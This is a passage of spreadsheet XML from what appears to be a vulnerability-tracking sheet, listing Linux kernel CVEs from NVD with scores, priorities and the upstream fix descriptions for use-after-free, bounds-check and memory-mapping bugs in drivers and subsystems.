          <t>HIGH</t>
        </is>
      </c>
      <c r="F471" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G471" s="5" t="inlineStr"/>
      <c r="H471" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I471" s="5" t="inlineStr"/>
      <c r="J471" s="5" t="inlineStr"/>
      <c r="K471" s="5" t="inlineStr"/>
      <c r="L471" s="5" t="inlineStr"/>
      <c r="M471" s="5" t="inlineStr"/>
      <c r="N471" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O471" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P471" s="5" t="inlineStr"/>
      <c r="Q471" s="5" t="inlineStr"/>
      <c r="R471" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
gtp: add synchronize_net() in gtp_newlink() error path to prevent use-after-free
gtp_newlink()'s error path frees tid_hash and addr_hash without
waiting for an RCU grace period after clearing sk_user_data. A
concurrent gtp_encap_recv() in softirq may still hold the gtp_dev
pointer obtained via rcu_dereference_sk_user_data() and access the
freed memory.
  BUG: KASAN: slab-use-after-free in gtp0_pdp_find+0x1f6/0x200 (gtp.c:152)
  Call Trace:
   &lt;IRQ&gt;
   gtp0_pdp_find+0x1f6/0x200
   gtp_encap_recv+0x527/0x24b0
   udp_queue_rcv_one_skb+0x75f/0xc10
Add synchronize_net() before the kfree calls in out_hashtable, which
covers all error paths from both gtp_encap_enable() and
gtp_create_sockets().</t>
        </is>
      </c>
      <c r="S471" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89789</t>
        </is>
      </c>
    </row>
    <row r="472">
      <c r="A472" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B472" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C472" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89791</t>
        </is>
      </c>
      <c r="D472" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E472" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F472" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G472" s="5" t="inlineStr"/>
      <c r="H472" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I472" s="5" t="inlineStr"/>
      <c r="J472" s="5" t="inlineStr"/>
      <c r="K472" s="5" t="inlineStr"/>
      <c r="L472" s="5" t="inlineStr"/>
      <c r="M472" s="5" t="inlineStr"/>
      <c r="N472" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O472" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P472" s="5" t="inlineStr"/>
      <c r="Q472" s="5" t="inlineStr"/>
      <c r="R472" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
perf: Fix use-after-free when perf mmap() revival races with the last munmap()
perf_mmap_close() drops rb-&gt;mmap_count *without* holding
event-&gt;mmap_mutex (the refcount_dec_and_test() right before the
refcount_dec_and_mutex_lock() of event-&gt;mmap_count). A concurrent
perf_mmap_rb() can slot its entire "revival" path into that window
(perf_mmap holds event-&gt;mmap_mutex for its whole duration, including
rb_alloc):
  munmap side (perf_mmap_close)          mmap side (perf_mmap_rb)
  -----------------------------------    --------------------------------
  rb-&gt;mmap_count 1 -&gt; 0   (no lock)      (holds event-&gt;mmap_mutex)
                                         inc_not_zero(rb-&gt;mmap_count) fails
                                         ring_buffer_attach(event, NULL)
                                         rb_alloc() + attach new rb
                                         refcount_set(&amp;event-&gt;mmap_count, 1)
  lock; event-&gt;mmap_count 1 -&gt; 0
  ring_buffer_attach(event, NULL)
  ring_buffer_put() -&gt; frees the *new* rb
The revival's refcount_set(&amp;event-&gt;mmap_count, 1) is an invisible
1 -&gt; 1 write: the close frees the just-revived buffer although the
other process still has it mapped -- a page-level use-after-free
allowing local privilege escalation to root by any unprivileged user
(default kernel.perf_event_paranoid=2).
Swap the order of the two counter updates: event-&gt;mmap_count is
dropped first via refcount_dec_and_mutex_lock(), so its 1 -&gt; 0
transition and the ring_buffer_attach() stay serialized with
perf_mmap(). rb-&gt;mmap_count == 0 then implies every event using the
buffer is detached already, so the result of the rb-&gt;mmap_count drop
can gate the remaining teardown directly and detach_rest is no longer
needed.
An earlier fix for this race from Kyle Zeng and David Lee takes
event-&gt;mmap_mutex around both counter updates [0]; here the not-last
close stays lockless.</t>
        </is>
      </c>
      <c r="S472" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89791</t>
        </is>
      </c>
    </row>
    <row r="473">
      <c r="A473" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B473" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C473" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89793</t>
        </is>
      </c>
      <c r="D473" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E473" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F473" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G473" s="5" t="inlineStr"/>
      <c r="H473" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I473" s="5" t="inlineStr"/>
      <c r="J473" s="5" t="inlineStr"/>
      <c r="K473" s="5" t="inlineStr"/>
      <c r="L473" s="5" t="inlineStr"/>
      <c r="M473" s="5" t="inlineStr"/>
      <c r="N473" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O473" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P473" s="5" t="inlineStr"/>
      <c r="Q473" s="5" t="inlineStr"/>
      <c r="R473" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ublk: clear VM_MAYWRITE on read-only ublk char device mmap
ublk_ch_mmap() rejects mmap requests with VM_WRITE set, but never
clears VM_MAYWRITE on the resulting read-only mapping. This allows
a userspace daemon to mmap the per-queue command buffer PROT_READ,
then upgrade it to PROT_WRITE via mprotect(), since VM_MAYWRITE was
never cleared.
The command buffer holds struct ublksrv_io_desc entries that are
kernel-written ABI; a writable mapping lets an unprivileged daemon
process corrupt fields such as addr, op_flags, nr_sectors, and
start_sector.
Same bug class as the drm/panthor and drm/vc4 VM_MAYWRITE fixes, and
the 2026-08-13 ptp/vmclock fix (a5edadbae57e).
Verified via mprotect() PoC: before the fix, a PROT_READ mapping can
be upgraded to PROT_READ|PROT_WRITE and a write into the command
buffer corrupts io_desc fields (confirmed under KASAN). After the
fix, mprotect() returns -EACCES.</t>
        </is>
      </c>
      <c r="S473" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89793</t>
        </is>
      </c>
    </row>
    <row r="474">
      <c r="A474" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B474" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C474" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89799</t>
        </is>
      </c>
      <c r="D474" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E474" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F474" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G474" s="5" t="inlineStr"/>
      <c r="H474" s="5" t="inlineStr"/>
      <c r="I474" s="5" t="inlineStr"/>
      <c r="J474" s="5" t="inlineStr"/>
      <c r="K474" s="5" t="inlineStr"/>
      <c r="L474" s="5" t="inlineStr"/>
      <c r="M474" s="5" t="inlineStr"/>
      <c r="N474" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O474" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P474" s="5" t="inlineStr"/>
      <c r="Q474" s="5" t="inlineStr"/>
      <c r="R474" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Disable preemption in bpf_get_stackid
The get_perf_callchain call needs disabled preemption plus we need
it disabled as long as we access its returned trace entries buffer.
Note the bpf_get_stackid_pe function is executed already with
preemption disabled.</t>
        </is>
      </c>
      <c r="S474" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89799</t>
        </is>
      </c>
    </row>
    <row r="475">
      <c r="A475" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B475" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C475" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89801</t>
        </is>
      </c>
      <c r="D475" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E475" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F475" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G475" s="5" t="inlineStr"/>
      <c r="H475" s="5" t="inlineStr"/>
      <c r="I475" s="5" t="inlineStr"/>
      <c r="J475" s="5" t="inlineStr"/>
      <c r="K475" s="5" t="inlineStr"/>
      <c r="L475" s="5" t="inlineStr"/>
      <c r="M475" s="5" t="inlineStr"/>
      <c r="N475" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O475" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P475" s="5" t="inlineStr"/>
      <c r="Q475" s="5" t="inlineStr"/>
      <c r="R475" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/nouveau/uvmm: fix premature region free on failed OP_UNMAP_SPARSE
In nouveau_uvmm_bind_job_submit()'s OP_UNMAP_SPARSE arm, op-&gt;reg is set
from nouveau_uvma_region_find(), which only looks the region up and takes
no reference; a region's sole reference is its membership in
uvmm-&gt;region_mt. Two failure paths leave op-&gt;reg set: the -ENOENT check
when the region is busy, and the drm_gpuvm_sm_unmap_ops_create() failure.
The sibling nouveau_uvmm_sm_unmap_prepare() failure just below clears
op-&gt;reg; these two do not.
unwind_continue steps back one op, so the failing op is skipped by the
unwind loop and its op-&gt;reg stays set. nouveau_uvmm_bind_job_cleanup()
then enters its if (op-&gt;reg) branch and calls nouveau_uvma_region_remove()
and nouveau_uvma_region_put() on it, dropping the tree's sole reference
and freeing a region this job never created. The comment above the
cleanup loop documents the broken invariant: op-&gt;reg must be NULL on
submit failure.
This frees a live region on an unrelated failure, reachable single-job
when drm_gpuvm_sm_unmap_ops_create() returns -ENOMEM; if another job owns
the same region, its cleanup then removes and puts the freed region, a
use-after-free. Clear op-&gt;reg on both failure paths.</t>
        </is>
      </c>
      <c r="S475" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89801</t>
        </is>
      </c>
    </row>
    <row r="476">
      <c r="A476" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B476" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C476" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89803</t>
        </is>
      </c>
      <c r="D476" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E476" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F476" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G476" s="5" t="inlineStr"/>
      <c r="H476" s="5" t="inlineStr"/>
      <c r="I476" s="5" t="inlineStr"/>
      <c r="J476" s="5" t="inlineStr"/>
      <c r="K476" s="5" t="inlineStr"/>
      <c r="L476" s="5" t="inlineStr"/>
      <c r="M476" s="5" t="inlineStr"/>
      <c r="N476" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O476" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P476" s="5" t="inlineStr"/>
      <c r="Q476" s="5" t="inlineStr"/>
      <c r="R476" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/nouveau: unsubscribe the channel-kill event before the fence context
nouveau_channel_del() tears the fence context down first and only drops
the channel-kill subscription later, in the middle of the nvif object
teardown:
	if (chan-&gt;fence)
		nouveau_fence(chan-&gt;cli-&gt;drm)-&gt;context_del(chan);
	...
	nvif_object_dtor(&amp;chan-&gt;vram);
	nvif_event_dtor(&amp;chan-&gt;kill);
The subscribed handler is nouveau_channel_killed(), which calls
nouveau_channel_kill() and from there nouveau_fence_context_kill() on
chan-&gt;fence. A kill event delivered in that window takes fctx-&gt;lock and
walks fctx-&gt;pending on a fence context that context_del() has already
freed.
Nothing reaches this below Fermi today, because the subscription is
gated on FERMI_CHANNEL_GPFIFO and nothing kills a channel there. On
Fermi and newer the window is real but narrow, since a kill has to land
exactly while the channel is being destroyed. That is reason enough on
its own, which is why this carries a Fixes: tag. The last patch in this
series subscribes Tesla channels as well; nothing kills those today, so
it does not widen the exposure now, but it is the groundwork for a
recovery path that would, and the ordering is better fixed before that
lands than alongside it.
Drop the subscription before anything it depends on is torn down.</t>
        </is>
      </c>
      <c r="S476" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89803</t>
        </is>
      </c>
    </row>
    <row r="477">
      <c r="A477" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B477" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C477" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89805</t>
        </is>
      </c>
      <c r="D477" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E477" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F477" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G477" s="5" t="inlineStr"/>
      <c r="H477" s="5" t="inlineStr"/>
      <c r="I477" s="5" t="inlineStr"/>
      <c r="J477" s="5" t="inlineStr"/>
      <c r="K477" s="5" t="inlineStr"/>
      <c r="L477" s="5" t="inlineStr"/>
      <c r="M477" s="5" t="inlineStr"/>
      <c r="N477" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O477" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P477" s="5" t="inlineStr"/>
      <c r="Q477" s="5" t="inlineStr"/>
      <c r="R477" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/pagemap: Fix folio allocation fallback and use-after-put
drm_pagemap_migrate_populate_ram_pfn() had two issues when populating
RAM PFNs with higher-order folios:
1. The higher-order vma_alloc_folio()/folio_alloc() calls did not pass
   __GFP_NOWARN, so a THP allocation failure under memory pressure
   would spam the kernel log, and there was no fallback path despite a
   TODO comment stating one was needed. Add __GFP_NOWARN to the
   higher-order allocation and, on failure, fall back to order-0
   allocations for the entire range originally covered by the failed
   higher-order allocation, leaving MIGRATE_PFN_COMPOUND unset for
   those PFNs.
2. In the free_pages error path, order was computed via
   folio_order(page_folio(page)) *after* put_page(page) had already
   dropped the reference, resulting in a use-after-free/put when that
   was the last reference on the page. Compute order before releasing
   the page.
Introducing the fallback in 1. also requires the source page array
handed to -&gt;copy_to_ram() to be built differently. Both callers only
populated the entry at the head of each source folio, relying on the
copy callback to derive the rest of the folio from the order recorded
in the matching drm_pagemap_addr. Once the destination has been demoted
to order-0 folios the drm_pagemap_addr entries are per-page, so a source
page is needed for every one of them; leaving them NULL makes the copy
callback stop after the first page and the remainder of the range is
never copied.
The source folio is only split later, by migrate_vma_pages() /
migrate_device_pages(), so its order cannot be used to detect the
demotion - test the destination for MIGRATE_PFN_COMPOUND instead. Factor
the array population out into drm_pagemap_migrate_populate_src_pages()
and use it from both drm_pagemap_evict_to_ram() and
__drm_pagemap_migrate_to_ram().</t>
        </is>
      </c>
      <c r="S477" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89805</t>
        </is>
      </c>
    </row>
    <row r="478">
      <c r="A478" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B478" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C478" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89808</t>
        </is>
      </c>
      <c r="D478" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E478" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F478" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G478" s="5" t="inlineStr"/>
      <c r="H478" s="5" t="inlineStr"/>
      <c r="I478" s="5" t="inlineStr"/>
      <c r="J478" s="5" t="inlineStr"/>
      <c r="K478" s="5" t="inlineStr"/>
      <c r="L478" s="5" t="inlineStr"/>
      <c r="M478" s="5" t="inlineStr"/>
      <c r="N478" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O478" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P478" s="5" t="inlineStr"/>
      <c r="Q478" s="5" t="inlineStr"/>
      <c r="R478" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amdkfd: Fix the case that vm range is hole at svm_migrate_copy_to_vram
When migration vm range is hole at cpu side(MIGRATE_PFN_MIGRATE set +
MIGRATE_PFN_VALID unset) driver still allocates device pages. There is no
dma map of src pages and migration. j is 0 and svm_migrate_copy_memory_gart()
will return an uninitialized r. That can trigger out_free_vram_pages to drop
all VRAM just set up.
Initialize r and only call the last svm_migrate_copy_memory_gart if j &gt; 0.
Current code postponed the last page to the final copy. This patch flushes on
the last page when reach to the end of current drm_buddy_block; avoids another
svm_migrate_copy_memory_gart.</t>
        </is>
      </c>
      <c r="S478" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89808</t>
        </is>
      </c>
    </row>
    <row r="479">
      <c r="A479" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B479" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C479" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89810</t>
        </is>
      </c>
      <c r="D479" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E479" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F479" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G479" s="5" t="inlineStr"/>
      <c r="H479" s="5" t="inlineStr"/>
      <c r="I479" s="5" t="inlineStr"/>
      <c r="J479" s="5" t="inlineStr"/>
      <c r="K479" s="5" t="inlineStr"/>
      <c r="L479" s="5" t="inlineStr"/>
      <c r="M479" s="5" t="inlineStr"/>
      <c r="N479" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O479" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P479" s="5" t="inlineStr"/>
      <c r="Q479" s="5" t="inlineStr"/>
      <c r="R479" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amdkfd: Fix error path at svm_migrate_copy_to_ram
If page migration from device to sys ram fails for some reasons driver needs
release and unlock allocated system pages. To do that driver should use page
physical address, or pfn, then get struct page*. Current driver uses dma
address(for adev) that is not correct with IOMMU enabled, or even in general.
The patch releases and unlocks allocated system pages based on where migration
failed by struct page* of sys ram pages. Also dma_unmap correspodent system
ram pages at error path.</t>
        </is>
      </c>
      <c r="S479" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89810</t>
        </is>
      </c>
    </row>
    <row r="480">
      <c r="A480" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B480" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C480" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89814</t>
        </is>
      </c>
      <c r="D480" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E480" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F480" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G480" s="5" t="inlineStr"/>
      <c r="H480" s="5" t="inlineStr"/>
      <c r="I480" s="5" t="inlineStr"/>
      <c r="J480" s="5" t="inlineStr"/>
      <c r="K480" s="5" t="inlineStr"/>
      <c r="L480" s="5" t="inlineStr"/>
      <c r="M480" s="5" t="inlineStr"/>
      <c r="N480" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O480" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P480" s="5" t="inlineStr"/>
      <c r="Q480" s="5" t="inlineStr"/>
      <c r="R480" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: clamp the isolation index for rings outside a partition
adev-&gt;isolation[] has one slot per partition, but a ring that is not
assigned to one keeps AMDGPU_XCP_NO_PARTITION, which is ~0, so indexing
the array with it is out of bounds. SDMA submissions hit this on both
the isolation enforcement and the VM flush path and trip UBSAN.
Fall back to the first slot the way the cleaner shader path already
does, and stop taking the address before the ring type check that makes
it relevant.</t>
        </is>
      </c>
      <c r="S480" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89814</t>
        </is>
      </c>
    </row>
    <row r="481">
      <c r="A481" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B481" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C481" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89815</t>
        </is>
      </c>
      <c r="D481" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E481" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F481" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G481" s="5" t="inlineStr"/>
      <c r="H481" s="5" t="inlineStr"/>
      <c r="I481" s="5" t="inlineStr"/>
      <c r="J481" s="5" t="inlineStr"/>
      <c r="K481" s="5" t="inlineStr"/>
      <c r="L481" s="5" t="inlineStr"/>
      <c r="M481" s="5" t="inlineStr"/>
      <c r="N481" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O481" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P481" s="5" t="inlineStr"/>
      <c r="Q481" s="5" t="inlineStr"/>
      <c r="R481" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/ttm: Drop tt-&gt;restore after successful restore
ttm_pool_restore_and_alloc() can successfully complete the restore
process via ttm_pool_restore_commit(), but tt-&gt;restore is not dropped
afterward. As a result, subsequent backup/restore flows observe what
appears to be a completed restore, while in reality shmem handles are
still installed in tt-&gt;pages, leading to the stack trace below.
Fix this by freeing and dropping tt-&gt;restore in
ttm_pool_restore_and_alloc() upon successful completion of the restore.
20545 [  309.784531] RIP: 0010:sg_alloc_append_table_from_pages+0x38c/0x490
20547 [  309.809570] RSP: 0018:ffffc9000623b838 EFLAGS: 00010206
20548 [  309.814827] RAX: 0000000000001000 RBX: ffff88816e42a160 RCX: 0000000000000000
20549 [  309.821986] RDX: 0000000000002000 RSI: 0000000000000003 RDI: 0000000000001000
20550 [  309.829147] RBP: ffff88816e42a168 R08: 0000000000000002 R09: 000000007ffff000
20551 [  309.836310] R10: ffffc9000623b928 R11: 0000000000000000 R12: 000000007ffff000
20552 [  309.843471] R13: ffff88815ba5a100 R14: 0000000000000000 R15: 0000000000000001
20553 [  309.850634] FS:  00007f9ff305e700(0000) GS:ffff888276c94000(0000) knlGS:0000000000000000
20554 [  309.858749] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
20555 [  309.864519] CR2: 00007f9fca701000 CR3: 00000001565e2005 CR4: 0000000008f70ef0
20556 [  309.871678] PKRU: 55555558
20557 [  309.874403] Call Trace:
20558 [  309.876866]  &lt;TASK&gt;
20559 [  309.878988]  sg_alloc_table_from_pages_segment+0x60/0x100
20560 [  309.884415]  ? ttm_resource_manager_usage+0x36/0x60 [ttm]
20561 [  309.889845]  ? xe_tt_map_sg+0x7d/0xd0 [xe]
20562 [  309.894045]  xe_tt_map_sg+0x7d/0xd0 [xe]
20563 [  309.898037]  xe_bo_move+0x927/0xaa0 [xe]
20564 [  309.902029]  ttm_bo_handle_move_mem+0xba/0x170 [ttm]
20565 [  309.907022]  ttm_bo_validate+0xbe/0x190 [ttm]
20566 [  309.911405]  xe_bo_validate+0x9a/0x120 [xe]
20567 [  309.915663]  xe_gpuvm_validate+0xd9/0x140 [xe]
20568 [  309.920206]  drm_gpuvm_validate+0x2f0/0x5b0 [drm_gpuvm]
20569 [  309.925459]  ? drm_exec_lock_obj+0x63/0x210 [drm_exec]
20570 [  309.930627]  xe_vm_validate_rebind+0x46/0xb0 [xe]
20571 [  309.935428]  xe_exec_fn+0x20/0x40 [xe]
20572 [  309.939249]  drm_gpuvm_exec_lock+0x78/0xc0 [drm_gpuvm]
20573 [  309.944410]  xe_validation_exec_lock+0x5a/0xa0 [xe]
20574 [  309.949385]  xe_exec_ioctl+0x806/0xc30 [xe]
20575 [  309.953639]  ? ttwu_queue_wakelist+0xd9/0xf0
20576 [  309.957935]  ? __pfx_xe_exec_fn+0x10/0x10 [xe]
20577 [  309.962449]  ? __wake_up_common+0x73/0xa0
20578 [  309.966482]  ? __pfx_xe_exec_ioctl+0x10/0x10 [xe]
20579 [  309.971263]  drm_ioctl_kernel+0xa3/0x100
20580 [  309.975209]  drm_ioctl+0x213/0x440
20581 [  309.978637]  ? __pfx_xe_exec_ioctl+0x10/0x10 [xe]
20582 [  309.983415]  xe_drm_ioctl+0x67/0xd0 [xe]
20583 [  309.987408]  __x64_sys_ioctl+0x7f/0xd0</t>
        </is>
      </c>
      <c r="S481" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89815</t>
        </is>
      </c>
    </row>
    <row r="482">
      <c r="A482" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B482" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C482" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89819</t>
        </is>
      </c>
      <c r="D482" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E482" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F482" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G482" s="5" t="inlineStr"/>
      <c r="H482" s="5" t="inlineStr"/>
      <c r="I482" s="5" t="inlineStr"/>
      <c r="J482" s="5" t="inlineStr"/>
      <c r="K482" s="5" t="inlineStr"/>
      <c r="L482" s="5" t="inlineStr"/>
      <c r="M482" s="5" t="inlineStr"/>
      <c r="N482" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O482" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P482" s="5" t="inlineStr"/>
      <c r="Q482" s="5" t="inlineStr"/>
      <c r="R482" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amd/display: validate plane degamma LUT size for private color prop
Unlike the CRTC degamma path, which is guarded by
amdgpu_dm_verify_lut_sizes(), the per-plane degamma LUT size was never
validated before use. __set_dm_plane_degamma() passed the user-supplied
size straight into __is_lut_linear() and, for a non-linear LUT, into
__set_input_tf() -&gt; __drm_lut_to_dc_gamma(), the latter always iterating
MAX_COLOR_LUT_ENTRIES entries regardless of the actual LUT size.
A malformed AMD_PLANE_DEGAMMA_LUT blob (e.g. a single entry) could thus
trigger a divide-by-zero in __is_lut_linear() or an out-of-bounds read in
__drm_lut_to_dc_gamma(). Reject any plane degamma LUT whose size does not
match MAX_COLOR_LUT_ENTRIES, mirroring the invariant the code already
asserts a few lines below (and which the CRTC path enforces).
The AMD_PLANE_DEGAMMA_LUT property is only exposed on builds with
AMD_PRIVATE_COLOR defined.</t>
        </is>
      </c>
      <c r="S482" s="6" t="inlineStr">
        <is>
